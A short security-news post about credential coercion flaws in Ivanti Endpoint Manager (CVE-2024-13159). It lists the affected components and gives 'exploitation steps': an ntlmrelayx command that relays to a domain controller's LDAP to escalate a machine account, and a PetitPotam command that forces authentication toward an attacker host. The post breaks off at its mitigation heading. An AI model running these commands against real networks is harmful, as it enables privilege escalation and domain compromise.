Ivanti Endpoint Manager – Multiple Credential Coercion Vulnerabilities (CVE–)

Listen to this Post

Proof of concept exploits for Ivanti EPM CVE-2024-13159 and other vulnerabilities have been disclosed, allowing unauthenticated coercion of the Ivanti EPM machine credential for use in relay attacks.

POC: https://lnkd.in/diHhiVjK

You Should Know:

1. Understanding Credential Coercion & Relay Attacks

Credential coercion forces a system to authenticate against a malicious server, while relay attacks forward these authentication attempts to exploit privileges.

2. Vulnerable Ivanti EPM Components

  • EPM Cloud Services Appliance (CSA)
  • EPM Core Server
  • EPM Agent

3. Proof-of-Concept Exploitation Steps


<h1>Use Impacket's ntlmrelayx for coercion attack</h1>

ntlmrelayx.py -t ldap://<target_DC_IP> --escalate-user <compromised_machine$>

<h1>Force authentication via PetitPotam (Python alternative)</h1>

python3 petitpotam.py -d <domain> -u <user> -p <password> <attacker_IP> <target_IP> 

#### **4. Mitigation & Detection**